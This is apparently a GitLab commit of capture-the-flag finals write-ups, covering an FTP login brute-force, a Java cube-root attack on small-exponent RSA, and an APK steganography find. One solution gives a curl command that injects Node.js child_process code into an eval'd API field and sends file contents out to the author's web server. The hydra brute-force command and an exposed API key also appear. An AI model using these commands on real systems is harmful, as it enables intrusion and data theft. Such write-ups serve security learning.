Commit 2adc34d4 authored by davit's avatar davit

Finals writeups

parent 24e0e2bd
We are given the IP of an FTP server. First thing to try is anonymous login, which worked. Ofcourse it was not that easy, and dumping all accessible files gave no flag. The server did contain a list of passwords and a list of username, so maybe we had to bruteforce the login?
Using hydra to bruteforce the FTP login (`hydra -l admin -P reversePasswords.list ftp://54.154.211.102:21 -vV -t 6 -I`) resulted in the `admin:cookies` credentials after ~20 minutes.
Login in as admin showed us a flag.txt file, containing the flag.
import java.math.BigInteger;
public class Datacube {
public static final BigInteger TWO = BigInteger.valueOf(2);
public static final BigInteger FF = BigInteger.valueOf(0xff);
public static void main(String[] args) {
BigInteger n = new BigInteger("634504ee7770f969cfb8d9065fdbe37c58ca33640a0ee82f6d50b0b6a451a18519b83ff730a4fc00232f7244ebd1ec4f1608613fbfcf4838bfec5a53466898eca14a41ece3db9a79b8a7d7460075b45300a011485508210cc534dcb400eaf9c616de3dd0612db41cd0363a5c49269a17ee04be80b50da93a226949b88baceb7d576473e8a2ab0b6dd46073b2f80980e7b45a8b3421fefdfcbdfa8f8262340844a11bf1681b30405967992f5afb3891ad85289eb79ad7e3e71a0861af8eb1b9ebcc3d6d454a193fd78cf7cf496345e50ba516bf86e02f89c21c443a5b8908670860d2ddc6f", 16);
BigInteger c = new BigInteger("14aa1e31e4c5ddcc4da5bf7716da53a532f4bce4ab0cca7489f849981c14edfdc486122c4f74e3d3f0ca375161a8c58b067fdd886e4a3cb29d77a3b2c27580b31ba3b2bba50212df8467655a950257aef8df0591f4a81c82a12216408a5af9a5f988069c5c0b49a7966ea8370dcee275decbc1c081e66ea0c802e0aac8aa33b9ed8eebc55533270c442bbbc81507b40b8a8e36507322ef4ba1371346c0020866791319ac327ae4e87f0af13fbf8e800d4e918d40f6bc7e9534bc60617e3021d40470cb181f1a1da6b755f8cd2291f6249ad0be20024b649b6ba84de31ad4f43823192d048", 16);
BigInteger i = BigInteger.ZERO;
// i = BigInteger.valueOf(63000); // Start close to the solution
while(true) {
BigInteger attempt = n.multiply(i).add(c);
BigInteger root = cubeRoot(attempt);
if(root.pow(3).equals(attempt)) {
System.out.println(toASCII(root));
return;
}
if(i.mod(BigInteger.valueOf(1000)).equals(BigInteger.ZERO)) {
System.out.println(i);
}
i = i.add(BigInteger.ONE);
}
}
private static String toASCII(BigInteger value) {
int length = (value.bitLength() + 7)/8;
char[] chars = new char[length];
for(int i = length - 1; i >= 0; --i) {
chars[i] = (char) value.and(FF).intValue();
value = value.shiftRight(8);
}
return new String(chars);
}
/* Find x for which x^3 <= i < (x+1)^3 using binary search */
public static BigInteger cubeRoot(BigInteger i) {
BigInteger high = BigInteger.valueOf(2);
BigInteger low = BigInteger.ONE;
while (high.pow(3).compareTo(i) < 0) {
low = high;
high = high.multiply(TWO);
}
while (true) {
BigInteger mid = low.add(high).divide(TWO);
BigInteger p = mid.pow(3);
if (p.equals(i)) {
return mid;
}
if (mid.equals(low)) {
if (high.pow(3).equals(i)) {
return high;
}
return low;
}
if (p.compareTo(i) < 0) {
low = mid;
} else {
high = mid;
}
}
}
}
N = 634504ee7770f969cfb8d9065fdbe37c58ca33640a0ee82f6d50b0b6a451a18519b83ff730a4fc00232f7244ebd1ec4f1608613fbfcf4838bfec5a53466898eca14a41ece3db9a79b8a7d7460075b45300a011485508210cc534dcb400eaf9c616de3dd0612db41cd0363a5c49269a17ee04be80b50da93a226949b88baceb7d576473e8a2ab0b6dd46073b2f80980e7b45a8b3421fefdfcbdfa8f8262340844a11bf1681b30405967992f5afb3891ad85289eb79ad7e3e71a0861af8eb1b9ebcc3d6d454a193fd78cf7cf496345e50ba516bf86e02f89c21c443a5b8908670860d2ddc6f
c = 14aa1e31e4c5ddcc4da5bf7716da53a532f4bce4ab0cca7489f849981c14edfdc486122c4f74e3d3f0ca375161a8c58b067fdd886e4a3cb29d77a3b2c27580b31ba3b2bba50212df8467655a950257aef8df0591f4a81c82a12216408a5af9a5f988069c5c0b49a7966ea8370dcee275decbc1c081e66ea0c802e0aac8aa33b9ed8eebc55533270c442bbbc81507b40b8a8e36507322ef4ba1371346c0020866791319ac327ae4e87f0af13fbf8e800d4e918d40f6bc7e9534bc60617e3021d40470cb181f1a1da6b755f8cd2291f6249ad0be20024b649b6ba84de31ad4f43823192d048
We were given both C and N of an encrypted plaintext. Assuming RSA we know that `p^e = C+i*N` for a certain i. If `e=3` and p is relatively small, this is bruteforceable. Solution in Datacube.java.
POST /foo/compute HTTP/1.1
Content-Type: application/json
x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj
Host: 3ogveoxr26.execute-api.eu-west-1.amazonaws.com
Content-Length: 91
Connection: close
{
"equation":"1+1"
}
\ No newline at end of file
We are given an example of how to query a calculator app in letsdance.txt .
Queries can be done with `curl https://3ogveoxr26.execute-api.eu-west-1.amazonaws.com/foo/compute -H "x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj" -v -H "Content-Type: application/json" --data '{"equation": "2+2"}'`.
The equation is eval'd, and the following command sends the flag base64 encoded to one of my webservers:
`curl https://3ogveoxr26.execute-api.eu-west-1.amazonaws.com/foo/compute -H "x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj" -v -H "Content-Type: application/json" --data "{\"equation\":\"typeof require('child_process').exec('curl https://my-website.be/FuckJeroenBlijfVanMijnPunten\$(cat index.js | grep -i CSC | base64)')\"}"`
We are given an apk. Trying to decompile results in obfuscated code, so let's first see what the application is trying to do. It turns out it generated ~500 images (see photos.zip). When calling `diff` on the hexdumps of the images, it becomes clear that each image is the same, except for the last few bytes that are appended and seem to be base64 encoded.
Flag found by running `strings * | grep $(echo -n "CSC" | base64) | base64 -d` in the photos directory.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment